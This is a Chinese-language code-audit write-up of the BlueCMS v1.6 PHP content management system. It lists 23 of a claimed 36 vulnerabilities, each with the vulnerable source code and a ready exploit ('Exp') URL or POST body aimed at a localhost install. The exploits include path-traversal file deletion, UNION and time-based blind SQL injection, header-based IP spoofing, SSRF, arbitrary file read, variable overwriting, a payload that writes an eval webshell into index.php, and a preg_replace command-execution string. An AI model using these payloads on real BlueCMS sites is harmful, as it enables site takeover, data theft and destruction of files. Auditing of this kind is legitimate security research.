代码审计:Bluecms v1.6
漏洞列表如下(共计36个漏洞,附Exp,按时间顺序):
未完待续…
1、user.php 766行处存在任意文件删除漏洞
Exp:``http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:face_pic3=2.php`
elseif($act == 'edit_user_info'){$user_id = intval($_SESSION['user_id']);if(empty($user_id)){return false;}$birthday = trim($_POST['birthday']);$sex = intval($_POST['sex']);$email = !empty($_POST['email']) ? trim($_POST['email']) : '';$msn = !empty($_POST['msn']) ? trim($_POST['msn']) : '';$qq = !empty($_POST['qq']) ? trim($_POST['qq']) : '';$mobile_phone = !empty($_POST['mobile_phone']) ? trim($_POST['mobile_phone']) : '';$office_phone = !empty($_POST['office_phone']) ? trim($_POST['office_phone']) : '';$home_phone = !empty($_POST['home_phone']) ? trim($_POST['home_phone']) : '';$address = !empty($_POST['address']) ? htmlspecialchars($_POST['address']) : '';if (!empty($_POST['face_pic1'])){if (strpos($_POST['face_pic1'], 'http://') != false && strpos($_POST['face_pic1'], 'https://') != false){showmsg('只支持本站相对路径地址');}else{$face_pic = trim($_POST['face_pic1']);}}else{if(file_exists(BLUE_ROOT.$_POST['face_pic3'])){@unlink(BLUE_ROOT.$_POST['face_pic3']);}}if(isset($_FILES['face_pic2']['error']) && $_FILES['face_pic2']['error'] == 0){$face_pic = $image->img_upload($_FILES['face_pic2'],'face_pic');}$face_pic = empty($face_pic) ? '' : $face_pic;$sql = "UPDATE ".table('user')." SET birthday = '$birthday', sex = '$sex', face_pic = '$face_pic', email = '$email', msn = '$msn', qq = '$qq'," ." mobile_phone = '$mobile_phone', office_phone = '$office_phone', home_phone = '$home_phone', address='$address' WHERE user_id = ".intval($_SESSION['user_id']);$db->query($sql);showmsg('更新个人资料成功', 'user.php');}
2、ad_js.php 19行处存在sql注入漏洞
Exp:view-source:http://127.0.0.3/bluecms/ad_js.php?ad_id=12%20+UNION%20+SELECT+1,2,3,4,5,6,database()
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
if($ad['time_set'] == 0)
{$ad_content = $ad['content'];
}
else
{if($ad['end_time'] < time()){$ad_content = $ad['exp_content'];}else{$ad_content = $ad['content'];}
}
$ad_content = str_replace('"', '\"',$ad_content);
$ad_content = str_replace("\r", "\\r",$ad_content);
$ad_content = str_replace("\n", "\\n",$ad_content);
echo "<!--\r\ndocument.write(\"".$ad_content."\");\r\n-->\r\n";
3、include/common.fun.php->getip()存在ip伪造漏洞
function getip()
{if (getenv('HTTP_CLIENT_IP')){$ip = getenv('HTTP_CLIENT_IP'); }elseif (getenv('HTTP_X_FORWARDED_FOR')) { //获取客户端用代理服务器访问时的真实ip 地址$ip = getenv('HTTP_X_FORWARDED_FOR');}elseif (getenv('HTTP_X_FORWARDED')) { $ip = getenv('HTTP_X_FORWARDED');}elseif (getenv('HTTP_FORWARDED_FOR')){$ip = getenv('HTTP_FORWARDED_FOR'); }elseif (getenv('HTTP_FORWARDED')){$ip = getenv('HTTP_FORWARDED');}else{ $ip = $_SERVER['REMOTE_ADDR'];}return $ip;
}
4、user.php 955行处存在任意文件删除漏洞
Exp:``http://127.0.0.3/bluecms/user.php?act=del_pic Post:id=2.php`
elseif($act == 'del_pic'){$id = $_REQUEST['id'];$db->query("DELETE FROM ".table('company_image')." WHERE path='$id'");if(file_exists(BLUE_ROOT.$id)){@unlink(BLUE_ROOT.$id);}}
5、user.php 476行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_info_edit Post提交post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php
elseif($act == 'do_info_edit'){$post_id = intval($_REQUEST['post_id']);if(empty($post_id)){return false;}$must_att_arr = array();$nomust_att_arr = array();$title = !empty($_POST['title']) ? trim($_POST['title']) : '';if($title == ''){showmsg('信息标题不能为空');}$cat_id = !empty($_POST['cat_id']) ? trim($_POST['cat_id']) : '';$area = !empty($_POST['area']) ? intval($_POST['area']) : '';$useful_time = intval($_POST['useful_time']);$content = !empty($_POST['content']) ? trim($_POST['content']) : '';if(!empty($content)){$content = str_replace(' ', ' ', str_replace(array("\r\n", "\r", "\n"), "<br/>", $content));}$is_recommend = !empty($_POST['is_recommend']) ? intval($_POST['is_recommend']) : 0;if($_POST['is_recommend1'] == 0){if($is_recommend == 1){$confirm_rec = 1;$rec_start = $timestamp;$rec_time = $_POST['rec_time'];if(!preg_match('/^[1-9][0-9]*$/', $rec_time)){showmsg('推荐时间格式出错');}$condition = " ,rec_start='$rec_start', rec_time='$rec_time' ";} else {$rec_time = 0;$condition = '';}} else {$rec_time = 0;$condition = '';}$top_type = intval($_POST['top_type']);if($_POST['top_type1'] == 0){if($top_type != 0){$confirm_top = 1;$top_start = $timestamp;$top_time = $_POST['top_time'];if(!preg_match('/^[1-9][0-9]*$/', $top_time)){showmsg('置顶时间格式出错');}$condition .= ",top_start='$top_start', top_time='$top_time' ";} else {$top_time = 0;$condition .= '';}} else {$top_time = 0;$condition .= '';}$is_head_line = intval($_POST['is_head_line']);if($_POST['is_head_line1'] == 0){if($is_head_line == 1){$confirm_head = 1;$head_line_start = $timestamp;$head_line_time = $_POST['head_line_time'];if(!preg_match('/^[1-9][0-9]*$/', $head_line_time)){showmsg('推荐时间格式出错');}$condition .= " ,head_line_start='$head_line_start', head_line_time='$head_line_time' ";} else {$head_line_time = 0;$condition .= '';}} else {$head_line_time = 0;$condition .= '';}$link_man = !empty($_POST['link_man']) ? trim($_POST['link_man']) : '';$link_phone = !empty($_POST['link_phone']) ? trim($_POST['link_phone']) : 0;$link_email = !empty($_POST['link_email']) ? trim($_POST['link_email']) : '';$link_qq = !empty($_POST['link_qq']) ? trim($_POST['link_qq']) : 0;$link_address = !empty($_POST['link_address']) ? trim($_POST['link_address']) : '';if($link_man==''){showmsg('联系人姓名不能为空');}if($link_phone==''){showmsg('为了体现信息真实,联系电话不要为空');}$must_att_arr = get_att($model_id, $_POST['att1'], 'must_att');$nomust_att_arr = get_att($model_id, $_POST['att2']);//交易过程$rec_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='rec'");if($top_type == 1){$service = 'top1';} else {$service = 'top2';}$top_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='$service'");$head_line_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='head_line'");$money = $_SESSION['money'] - $rec_service['price'] * $rec_time - $top_service['price'] * $top_time - $head_line_service['price'] * $head_line_time;if ($money < 0){showmsg('对不起,您的余额不足,请充值');}if ($confirm_rec == 1) {$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time) VALUES ('', '$_SESSION[user_id]', '$post_id', '$rec_service[id]', '$rec_time', '$timestamp'");}if ($confirm_top == 1) {$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time)VALUES ('', '$_SESSION[user_id]', '$post_id', '$top_service[id]', '$top_time', '$timestamp'");}if ($confirm_head == 1) {$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time)VALUES ('', '$_SESSION[user_id]', '$post_id', '$top_service[id]', '$head_line_time', '$timestamp'");}//从用户账户扣除花费金币$db->query("UPDATE ".table('user')." SET money='$money' WHERE user_id=$_SESSION[user_id]");//更新post表SQL语句$sql = "UPDATE ".table('post')." SET cat_id='$cat_id', area_id='$area', title='$title', keywords='$keywords', content='$content', link_man='$link_man', link_phone='$link_phone', is_recommend='$is_recommend', top_type='$top_type', is_head_line='$is_head_line' ".$condition.", link_email='$link_email', link_qq='$link_qq', link_address='$link_address', useful_time='$useful_time' WHERE post_id=".$post_id;$db->query($sql);//插入新属性$db->query("DELETE FROM ".table('post_att')." WHERE post_id =".$post_id);insert_att_value($must_att_arr, $post_id);insert_att_value($nomust_att_arr, $post_id);//插入新图片$db->query("DELETE FROM ".table('post_pic')." WHERE post_id = ".$post_id);for($i=0;$i<4;$i++){if($_POST['pic'.$i] && file_exists(BLUE_ROOT.$_POST['pic'.$i])){$sql = "INSERT INTO ".table('post_pic')." (pic_id, post_id, pic_path) VALUES ('', '$post_id', '".$_POST['pic'.$i]."')";$db->query($sql);}}//如果没有图片,则将信息缩略图设置为默认图片if (file_exists(BLUE_ROOT.$_POST['lit_pic'])) {@unlink(BLUE_ROOT.$_POST['lit_pic']);}if($_POST['pic0']){$lit_pic = $image->small_img($_POST['pic0'], 126, 80);$db->query("UPDATE ".table('post')." SET lit_pic='$lit_pic' WHERE post_id='$post_id'");}else{$db->query("UPDATE ".table('post')." SET lit_pic='' WHERE post_id='$post_id'");}showmsg('编辑信息成功', 'user.php?act=manage');}
6、admin/article.php 132行处存在后台sql注入漏洞
Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注
elseif($act == 'del'){$article = $db->getone("SELECT cid, lit_pic FROM ".table('article')." WHERE id=".$_GET['id']);$sql = "DELETE FROM ".table('article')." WHERE id=".intval($_GET['id']);$db->query($sql);if (file_exists(BLUE_ROOT.$article['lit_pic'])) {@unlink(BLUE_ROOT.$article['list_pic']);}showmsg('删除本地新闻成功', 'article.php?cid='.$article['cid']);}
7、admin/article.php 85行处存在任意文件删除漏洞
Exp:article.html
如下:
<!DOCTYPE html>
<html>
<head><title>Form with File Upload and Additional Parameters</title>
</head>
<body>
<form action="http://127.0.0.3/bluecms/admin/article.php?act=do_edit" method="post" enctype="multipart/form-data"><input type="hidden" name="title" value="1"><input type="hidden" name="color" value="1"><input type="hidden" name="cid" value="1"><input type="hidden" name="author" value="admin"><input type="hidden" name="source" value="1"><input type="hidden" name="is_recommend" value="1"><input type="hidden" name="is_check" value="1"><label for="lit_pic1">要删除的文件名:</label><input type="text" id="lit_pic1" name="lit_pic1"><br><br><label for="lit_pic2">Upload Picture 2:</label><input type="file" id="lit_pic2" name="lit_pic2"><br><br><input type="submit" value="Submit">
</form>
</body>
</html>
elseif($act == 'do_edit'){$title = !empty($_POST['title']) ? trim($_POST['title']) : '';$color = !empty($_POST['color']) ? trim($_POST['color']) : '';$cid = !empty($_POST['cid']) ? intval($_POST['cid']) : '';if(empty($cid)){showmsg('新闻分类不能为空');}$author = !empty($_POST['author']) ? trim($_POST['author']) : $_SESSION['admin_name'];$source = !empty($_POST['source']) ? trim($_POST['source']) : '';$is_recommend = intval($_POST['is_recommend']);$is_check = intval($_POST['is_check']);if((!empty($_POST['lit_pic1']) && !empty($_FILES['lit_pic2']['name'])) || !empty($_FILES['lit_pic2']['name'])){if (file_exists(BLUE_ROOT . $_POST['lit_pic1'])){@unlink(BLUE_ROOT . $_POST['lit_pic1']);}if($_FILES['lit_pic2']['error'] == 0){$lit_pic = $image->img_upload($_FILES['lit_pic2'],'lit_pic');}$lit_pic = empty($lit_pic) ? '' : $lit_pic;if(!empty($lit_pic)){$lit_pic = $image->small_img($lit_pic, 200, 115);}}else{$lit_pic = !empty($_POST['lit_pic1']) ? $_POST['lit_pic1'] :'';}$content = !empty($_POST['content']) ? trim($_POST['content']) : '';$descript = !empty($_POST['descript']) ? mb_substr($_POST['descript'], 0, 250) : mb_substr(html2text($_POST['content']),0, 250);if($title == ''){showmsg('新闻标题不能为空');}if($content == ''){showmsg('新闻内容不能为空');}$sql = "UPDATE ".table('article')." SET cid='$cid', title='$title', color='$color', author='$author', source='$source', lit_pic='$lit_pic', descript='$descript', content='$content', is_recommend='$is_recommend', is_check='$is_check' WHERE id=".intval($_POST['id']);$db->query(($sql));showmsg('编辑新闻成功', 'article.php?cid='.$cid);}
8、admin/attachment.php 78行处存在后台sql注入漏洞
Exp:http://127.0.0.3/bluecms/admin/attachment.php?act=del&att_id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注
elseif($_REQUEST['act'] == 'del'){$sql = "DELETE FROM ".table('attachment')." WHERE att_id = ".$_GET['att_id'];if(!$db->query($sql)){showmsg('删除附加属性出错', true);}showmsg('删除附加属性成功','attachment.php', true);}
9、admin/database.php 208行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&file_name=../1.php
elseif($act == 'del')
{$file_name = !empty($_GET['file_name']) ? trim($_GET['file_name']) : '';$file = BLUE_ROOT.DATA."backup/".$file_name;if(!@unlink($file)){showmsg('删除备份文件失败');}else{showmsg('删除备份文件成功', 'database.php?act=restore');}}
10、admin/flash.php 47行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path2=../1.php
elseif($act == 'do_edit'){if(empty($_POST['image_id'])){return false;}$image_link = !empty($_POST['image_link']) ? trim($_POST['image_link']) : '';$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';$image_path = !empty($_POST['image_path']) ? trim($_POST['image_path']) : '';if (!empty($_POST['image_path'])){if (strpos($_POST['image_path'], 'http://') != false && strpos($_POST['image_path'], 'https://') != false){showmsg('只支持本站相对路径地址');}else{$link_logo = trim($_POST['image_path']);}}else{if(file_exists(BLUE_ROOT.$_POST['image_path2'])){@unlink(BLUE_ROOT.$_POST['image_path2']);}}if(isset($_FILES['image_path1']['error']) && $_FILES['image_path1']['error'] == 0){$image_path = $image->img_upload($_FILES['image_path1'],'flash');}$image_path = empty($image_path) ? '' : $image_path;if(!$db->query("UPDATE ".table('flash_image')." SET image_path='$image_path', image_link='$image_link', show_order='$show_order' WHERE image_id=".intval($_POST['image_id']))){showmsg('更新flash图片出错', true);}else{showmsg('更新flash图片成功', 'flash.php', true);}}
elseif($act == 'del'){if(empty($_GET['image_id'])){return false;}$flash = $db->getone("SELECT image_path FROM ".table('flash_image')." WHERE image_id =".intval($_GET['image_id']));if(file_exists(BLUE_ROOT.$flash['image_path'])){@unlink(BLUE_ROOT.$flash['image_path']);}if(!$db->query("DELETE FROM ".table('flash_image')." WHERE image_id = ".intval($_GET['image_id']))){showmsg('删除Flash图片出错', true);}else{showmsg('删除Flash图片成功!','flash.php', true);}
}
11、admin/flash.php 47行处存在SSRF漏洞
Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path=http://网站 触发:点击flash链接(逻辑漏洞,strpos($_POST['image_path'], 'http://') != false,strpos返回的是位置,如果'http://'在首位,返回0.而0不等于false,从而绕过判断)
elseif($act == 'do_edit'){if(empty($_POST['image_id'])){return false;}$image_link = !empty($_POST['image_link']) ? trim($_POST['image_link']) : '';$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';$image_path = !empty($_POST['image_path']) ? trim($_POST['image_path']) : '';if (!empty($_POST['image_path'])){if (strpos($_POST['image_path'], 'http://') != false && strpos($_POST['image_path'], 'https://') != false){showmsg('只支持本站相对路径地址');}else{$link_logo = trim($_POST['image_path']);}}else{if(file_exists(BLUE_ROOT.$_POST['image_path2'])){@unlink(BLUE_ROOT.$_POST['image_path2']);}}if(isset($_FILES['image_path1']['error']) && $_FILES['image_path1']['error'] == 0){$image_path = $image->img_upload($_FILES['image_path1'],'flash');}$image_path = empty($image_path) ? '' : $image_path;if(!$db->query("UPDATE ".table('flash_image')." SET image_path='$image_path', image_link='$image_link', show_order='$show_order' WHERE image_id=".intval($_POST['image_id']))){showmsg('更新flash图片出错', true);}else{showmsg('更新flash图片成功', 'flash.php', true);}}
elseif($act == 'del'){if(empty($_GET['image_id'])){return false;}$flash = $db->getone("SELECT image_path FROM ".table('flash_image')." WHERE image_id =".intval($_GET['image_id']));if(file_exists(BLUE_ROOT.$flash['image_path'])){@unlink(BLUE_ROOT.$flash['image_path']);}if(!$db->query("DELETE FROM ".table('flash_image')." WHERE image_id = ".intval($_GET['image_id']))){showmsg('删除Flash图片出错', true);}else{showmsg('删除Flash图片成功!','flash.php', true);}
}
12、admin/link.php 50行处存在SSRF漏洞
Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo=http://网站 触发:点击网站上导航链接
elseif($act == 'do_edit'){$link_name = !empty($_POST['link_name']) ? trim($_POST['link_name']) : '';$link_site = !empty($_POST['link_site']) ? trim($_POST['link_site']) : '';$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : 0;if (!empty($_POST['link_logo'])){if (strpos($_POST['link_logo'], 'http://') != false && strpos($_POST['link_logo'], 'https://') != false){showmsg('只支持本站相对路径地址');}else{$link_logo = trim($_POST['link_logo']);}}else{if(file_exists(BLUE_ROOT.$_POST['link_logo2'])){@unlink(BLUE_ROOT.$_POST['link_logo2']);}}if(isset($_FILES['link_logo1']['error']) && $_FILES['link_logo1']['error'] == 0){$link_logo = $image->img_upload($_FILES['link_logo1'],'linklogo');}$link_logo = empty($link_logo) ? '' : $link_logo;$sql = "UPDATE ".table('link')." SET linkname = '$link_name', linksite = '$link_site', linklogo = '$link_logo', showorder = '$show_order' WHERE linkid=".intval($_REQUEST['linkid']);if(!$db->query($sql)){showmsg('编辑链接失败');}else{showmsg('编辑链接成功','link.php');}}
13、admin/link.php 50行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo2=../1.php
elseif($act == 'do_edit'){$link_name = !empty($_POST['link_name']) ? trim($_POST['link_name']) : '';$link_site = !empty($_POST['link_site']) ? trim($_POST['link_site']) : '';$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : 0;if (!empty($_POST['link_logo'])){if (strpos($_POST['link_logo'], 'http://') != false && strpos($_POST['link_logo'], 'https://') != false){showmsg('只支持本站相对路径地址');}else{$link_logo = trim($_POST['link_logo']);}}else{if(file_exists(BLUE_ROOT.$_POST['link_logo2'])){@unlink(BLUE_ROOT.$_POST['link_logo2']);}}if(isset($_FILES['link_logo1']['error']) && $_FILES['link_logo1']['error'] == 0){$link_logo = $image->img_upload($_FILES['link_logo1'],'linklogo');}$link_logo = empty($link_logo) ? '' : $link_logo;$sql = "UPDATE ".table('link')." SET linkname = '$link_name', linksite = '$link_site', linklogo = '$link_logo', showorder = '$show_order' WHERE linkid=".intval($_REQUEST['linkid']);if(!$db->query($sql)){showmsg('编辑链接失败');}else{showmsg('编辑链接成功','link.php');}}
14、admin/info.php 281行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/info.php?act=do_edit Post:post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php
elseif($act == 'do_edit')
{$must_att_arr = array();$nomust_att_arr = array();$title = !empty($_POST['title']) ? trim($_POST['title']) : '';$cat_id = !empty($_POST['cat_id']) ? trim($_POST['cat_id']) : '';$area = !empty($_POST['area']) ? intval($_POST['area']) : '';$useful_time = intval($_POST['useful_time']);$content = !empty($_POST['content']) ? trim($_POST['content']) : '';if(!empty($content)){$content = str_replace(' ', ' ', str_replace(array("\r\n", "\r", "\n"), "<br/>", $content));}$is_check = !empty($_POST['is_check']) ? intval($_POST['is_check']) : 0;$is_recommend = !empty($_POST['is_recommend']) ? intval($_POST['is_recommend']) : 0;if($_POST['is_recommend1'] == 0){if ($is_recommend == 1){$rec_start = $timestamp;$rec_time = $_POST['rec_time'];if(!preg_match('/^[1-9][0-9]*$/', $rec_time)){showmsg('推荐时间格式出错');}$condition = " ,rec_start='$rec_start', rec_time='$rec_time' ";}else{$rec_time = '';$condition = '';}}else{$rec_time = '';if ($is_recommend == 0){$condition = " ,rec_start='', rec_time='' ";}else{$condition = '';}}$top_type = !empty($_POST['top_type']) ? intval($_POST['top_type']) : 0;if ($_POST['top_type1'] == 0){if ($top_type != 0){$top_start = $timestamp;$top_time = $_POST['top_time'];if(!preg_match('/^[1-9][0-9]*$/', $top_time)){showmsg('置顶时间格式出错');}$condition .= ",top_start='$top_start', top_time='$top_time' ";}else{$top_time = '';$condition .= '';}}else{$top_time = '';if ($top_type == 0){$condition = " ,top_start='', top_time='' ";}else{$condition = '';}}$is_head_line = intval($_POST['is_head_line']);if($_POST['is_head_line1'] == 0){if($is_head_line == 1){$confirm_head = 1;$head_line_start = $timestamp;$head_line_time = $_POST['head_line_time'];if(!preg_match('/^[1-9][0-9]*$/', $head_line_time)){showmsg('头条时间格式出错');}$condition .= " ,head_line_start='$head_line_start', head_line_time='$head_line_time' ";}else{$head_line_time = 0;$condition .= '';}}else{$head_line_time = 0;$condition .= '';}$link_man = !empty($_POST['link_man']) ? trim($_POST['link_man']) : '';$link_phone = !empty($_POST['link_phone']) ? trim($_POST['link_phone']) : 0;$link_email = !empty($_POST['link_email']) ? trim($_POST['link_email']) : '';$link_qq = !empty($_POST['link_qq']) ? trim($_POST['link_qq']) : 0;$link_address = !empty($_POST['link_address']) ? trim($_POST['link_address']) : '';if($title == ''){showmsg('信息标题不能为空');}if($top_type==0 && $top_time > 0){showmsg('只有在开启置顶功能时,才能设置置顶时间');}if($link_man==''){showmsg('联系人姓名不能为空');}if($link_phone==''){showmsg('为了体现信息真实,联系电话不要为空');}$must_att_arr = get_att($model_id, $_POST['att1'], 'must_att');$nomust_att_arr = get_att($model_id, $_POST['att2']);$sql = "UPDATE ".table('post')." SET cat_id='$cat_id', area_id='$area', title='$title', keywords='$keywords', content='$content', link_man='$link_man', link_phone='$link_phone', link_email='$link_email', link_qq='$link_qq', link_address='$link_address', useful_time='$useful_time', is_check='$is_check', is_recommend='$is_recommend' ".$condition.", top_type='$top_type', is_head_line='$is_head_line' WHERE post_id=".intval($post_id);$db->query($sql);$db->query("DELETE FROM ".table('post_att')." WHERE post_id =".intval($post_id));insert_att_value($must_att_arr, $post_id);insert_att_value($nomust_att_arr, $post_id);$db->query("DELETE FROM ".table('post_pic')." WHERE post_id=".intval($post_id));for($i=0;$i<4;$i++){if($_POST['pic'.$i] && file_exists(BLUE_ROOT.$_POST['pic'.$i])){$sql = "INSERT INTO ".table('post_pic')." (pic_id, post_id, pic_path) VALUES ('', '$post_id', '".$_POST['pic'.$i]."')";$db->query($sql);}}if (file_exists(BLUE_ROOT.$_POST['lit_pic'])){@unlink(BLUE_ROOT.$_POST['lit_pic']);}if($_POST['pic0']){include_once(BLUE_ROOT."include/upload.class.php");$image = new upload();$lit_pic = $image->small_img($_POST['pic0'],126, 80);$db->query("UPDATE ".table('post')." SET lit_pic='$lit_pic' WHERE post_id='$post_id'");}else{$db->query("UPDATE ".table('post')." SET lit_pic='' WHERE post_id='$post_id'");}showmsg('编辑信息成功', 'info.php?cid='.get_parentid($cat_id));
}
15、admin/info.php 526行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/info.php?act=del_pic Post:id=../1.php
elseif($act == 'del_pic')
{$id = $_REQUEST['id'];$db->query("DELETE FROM ".table('post_pic')." WHERE pic_path='$id'");if(file_exists(BLUE_ROOT.$id)){@unlink(BLUE_ROOT.$id);}
}
16、admin/link.php 79行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/link.php?act=del&linkid=1 Post:link_logo=../1.php
elseif($act == 'del'){if(empty($_GET['linkid'])){return false;}$link = $db->getone("SELECT linklogo FROM ".table('link')." WHERE linkid=".intval($_GET['linkid']));if(file_exists(BLUE_ROOT.$link['linklogo'])){@unlink(BLUE_ROOT.$link['linklogo']);}$sql = "DELETE FROM ".table('link')." WHERE linkid=".intval($_GET['linkid']);if(!$db->query($sql)){showmsg('删除友情链接失败');}else{showmsg('删除友情链接成功','link.php');}}
17、admin/nav.php 63行存在后台sql注入漏洞
Exp:http://127.0.0.3/bluecms/admin/nav.php?act=edit&navid=1 union select 1,2,3,4,user(),6 limit 1,1
elseif($act=='edit'){$sql = "select * from ".table('navigate')." where navid = ".$_GET['navid'];$nav = $db->getone($sql);$smarty->assign('nav',$nav);$smarty->assign('act', $act );$smarty->display('nav_info.htm');}
18、admin/tpl_manage.php 47行处存在任意文件写入漏洞,可写入webshell _
_Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=do_edit Post:tpl_name=../../index.php&tpl_content=<?php eval($_POST[1]);?>
elseif($act == 'do_edit'){$tpl_name = !empty($_POST['tpl_name']) ? trim($_POST['tpl_name']) : '';$tpl_content = !empty($_POST['tpl_content']) ? deep_stripslashes($_POST['tpl_content']) : '';if(empty($tpl_name)){return false;}$tpl = BLUE_ROOT.'templates/default/'.$tpl_name;if(!$handle = @fopen($tpl, 'wb')){showmsg("打开目标模版文件 $tpl 失败");}if(fwrite($handle, $tpl_content) === false){showmsg('写入目标 $tpl 失败');}fclose($handle);showmsg('编辑模板成功', 'tpl_manage.php');}
19、admin/tpl_manage.php 35行处存在任意文件读取漏洞
Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=edit&tpl_name=../../1.txt
elseif($act == 'edit'){$file = $_GET['tpl_name'];if(!$handle = @fopen(BLUE_ROOT.'templates/default/'.$file, 'rb')){showmsg('打开目标模板文件失败');}$tpl['content'] = fread($handle, filesize(BLUE_ROOT.'templates/default/'.$file));$tpl['content'] = htmlentities($tpl['content'], ENT_QUOTES, GB2312);fclose($handle);$tpl['name'] = $file;template_assign(array('current_act', 'tpl'), array('编辑模板', $tpl));$smarty->display('tpl_info.htm');}
20、include/filter.inc.php 11行处存在变量覆盖漏洞(影响user.php)
Exp:http://127.0.0.3/bluecms/user.php?{变量名}={变量值}
foreach (array($_GET, $_POST) as $v)
{foreach ($v as $k1 => $v1){$$k1 = filter($k1, $v1);}
}
21、uc_client/lib/uccode.class.php 38行处存在命令执行漏洞
Exp:$message = "[email=attacker@example.com]Hello; system('ls'); [/email]";
function complie($message) {$message = htmlspecialchars($message);if(strpos($message, '[/code]') !== FALSE) {$message = preg_replace("/\s*\[code\](.+?)\[\/code\]\s*/ies", "\$this->codedisp('\\1')", $message);}if(strpos($message, '[/url]') !== FALSE) {$message = preg_replace("/\[url(=((https?|ftp|gopher|news|telnet|rtsp|mms|callto|bctp|ed2k|thunder|synacast){1}:\/\/|www\.)([^\[\"']+?))?\](.+?)\[\/url\]/ies", "\$this->parseurl('\\1', '\\5')", $message);}if(strpos($message, '[/email]') !== FALSE) {$message = preg_replace("/\[email(=([a-z0-9\-_.+]+)@([a-z0-9\-_]+[.][a-z0-9\-_.]+))?\](.+?)\[\/email\]/ies", "\$this->parseemail('\\1', '\\4')", $message);}$message = str_replace(array('[/color]', '[/size]', '[/font]', '[/align]', '[b]', '[/b]','[i]', '[/i]', '[u]', '[/u]', '[list]', '[list=1]', '[list=a]','[list=A]', '[*]', '[/list]', '[indent]', '[/indent]', '[/float]'), array('</font>', '</font>', '</font>', '</p>', '<strong>', '</strong>', '<i>','</i>', '<u>', '</u>', '<ul>', '<ul type="1">', '<ul type="a">','<ul type="A">', '<li>', '</ul>', '<blockquote>', '</blockquote>', '</span>'), preg_replace(array("/\[color=([#\w]+?)\]/i","/\[size=(\d+?)\]/i","/\[size=(\d+(\.\d+)?(px|pt|in|cm|mm|pc|em|ex|%)+?)\]/i","/\[font=([^\[\<]+?)\]/i","/\[align=(left|center|right)\]/i","/\[float=(left|right)\]/i"), array("<font color=\"\\1\">","<font size=\"\\1\">","<font style=\"font-size: \\1\">","<font face=\"\\1 \">","<p align=\"\\1\">","<span style=\"float: \\1;\">"), $message));if(strpos($message, '[/quote]') !== FALSE) {$message = preg_replace("/\s*\[quote\][\n\r]*(.+?)[\n\r]*\[\/quote\]\s*/is", $this->tpl_quote(), $message);}if(strpos($message, '[/img]') !== FALSE) {$message = preg_replace(array("/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/ies","/\[img=(\d{1,4})[x|\,](\d{1,4})\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/ies"), array("\$this->bbcodeurl('\\1', '<img src=\"%s\" border=\"0\" alt=\"\" />')","\$this->bbcodeurl('\\3', '<img width=\"\\1\" height=\"\\2\" src=\"%s\" border=\"0\" alt=\"\" />')"), $message);}for($i = 0; $i <= $this->uccode['pcodecount']; $i++) {$message = str_replace("[\tUCENTER_CODE_$i\t]", $this->uccode['codehtml'][$i], $message);}return nl2br(str_replace(array("\t", ' ', ' '), array(' ', ' ', ' '), $message));}
22、comment.php 113行处存在sql注入漏洞
Exp:http://127.0.0.3/bluecms/comment.php?act=send&id=1 Post:mood=1&comment=hhh&type=1 Client-Ip:1','1'),('','1','1','1','1',database(),'1','1
elseif($act == 'send')
{if(empty($id)){return false;}$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;$mood = intval($_POST['mood']);$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';$content = nl2br($content);$type = intval($_POST['type']);if(empty($content)){showmsg('评论内容不能为空');}if($_CFG['comment_is_check'] == 0){$is_check = 1;}else{$is_check = 0;}$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";$db->query($sql);if($type == 1){$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);}elseif($type == 0){$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);}if($_CFG['comment_is_check'] == 1){showmsg('请稍候,您的评论正在审核当中...','comment.php?id='.$id.'&type='.$type);}else{showmsg('发布评论成功','comment.php?id='.$id.'&type='.$type);}
}
23、user.php 112行处存在任意文件读取漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_login Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_login
